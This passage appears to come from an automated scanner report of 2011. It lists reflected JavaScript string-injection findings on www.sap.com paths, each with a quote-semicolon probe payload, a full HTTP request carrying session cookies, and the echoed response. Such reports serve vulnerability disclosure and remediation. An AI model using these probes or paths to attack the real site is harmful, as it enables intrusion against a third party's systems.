Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:09 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:09 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:08 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='globala05b7';45b4788a8c7';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.104. http://www.sap.com/global/ui/js/mtagconfig.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/js/mtagconfig.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1a27'%3b9799824c8c5 was submitted in the REST URL parameter 1. This input was echoed as a1a27';9799824c8c5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /globala1a27'%3b9799824c8c5/ui/js/mtagconfig.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34194
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:07 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:07 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:06 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='globala1a27';9799824c8c5';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.105. http://www.sap.com/global/ui/js/pageload.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/js/pageload.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36482'%3b07344e13425 was submitted in the REST URL parameter 1. This input was echoed as 36482';07344e13425 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global36482'%3b07344e13425/ui/js/pageload.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34180
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:14 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:14 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:14 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global36482';07344e13425';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.106. http://www.sap.com/global/ui/js/samlscript.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/js/samlscript.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56c2e'%3b24783e50e3c was submitted in the REST URL parameter 1. This input was echoed as 56c2e';24783e50e3c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global56c2e'%3b24783e50e3c/ui/js/samlscript.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34194
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:35 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:35 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global56c2e';24783e50e3c';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.107. http://www.sap.com/global/ui/js/samlsessionscript.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/js/samlsessionscript.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4a85'%3bc5184766698 was submitted in the REST URL parameter 1. This input was echoed as e4a85';c5184766698 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /globale4a85'%3bc5184766698/ui/js/samlsessionscript.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34259
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:07 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:07 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:06 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='globale4a85';c5184766698';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.108. http://www.sap.com/global/ui/js/securedforms.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/js/securedforms.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 183b0'%3b403f5d13ed4 was submitted in the REST URL parameter 1. This input was echoed as 183b0';403f5d13ed4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global183b0'%3b403f5d13ed4/ui/js/securedforms.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34208
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:09 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:09 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:08 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global183b0';403f5d13ed4';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.109. http://www.sap.com/global/ui/js/securelayers.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/js/securelayers.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbae5'%3b6927fdc0b2c was submitted in the REST URL parameter 1. This input was echoed as dbae5';6927fdc0b2c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /globaldbae5'%3b6927fdc0b2c/ui/js/securelayers.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34208
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:07 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:07 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:06 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='globaldbae5';6927fdc0b2c';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.110. http://www.sap.com/global/ui/js/survey.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/js/survey.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f84b'%3b8f94007213d was submitted in the REST URL parameter 1. This input was echoed as 2f84b';8f94007213d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global2f84b'%3b8f94007213d/ui/js/survey.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34166
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:07 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:07 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:06 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global2f84b';8f94007213d';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.111. http://www.sap.com/global/ui/js/trackinghelper.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/js/trackinghelper.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1088e'%3bc4287d6548d was submitted in the REST URL parameter 1. This input was echoed as 1088e';c4287d6548d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global1088e'%3bc4287d6548d/ui/js/trackinghelper.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34238
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:06 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:06 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:05 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global1088e';c4287d6548d';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.112. http://www.sap.com/global/ui/richmedia/css/UMP/rm_UMP_css.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/richmedia/css/UMP/rm_UMP_css.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5d56'%3b550ae090394 was submitted in the REST URL parameter 1. This input was echoed as b5d56';550ae090394 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /globalb5d56'%3b550ae090394/ui/richmedia/css/UMP/rm_UMP_css.css HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/css,*/*;q=0.1
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34343
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:09 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:09 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:08 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='globalb5d56';550ae090394';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.113. http://www.sap.com/global/ui/richmedia/js/projects/rm_UMP/rm_UMP.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/richmedia/js/projects/rm_UMP/rm_UMP.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d960e'%3bdf9b76a1320 was submitted in the REST URL parameter 1. This input was echoed as d960e';df9b76a1320 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /globald960e'%3bdf9b76a1320/ui/richmedia/js/projects/rm_UMP/rm_UMP.js HTTP/1.1
Host: www.sap.com
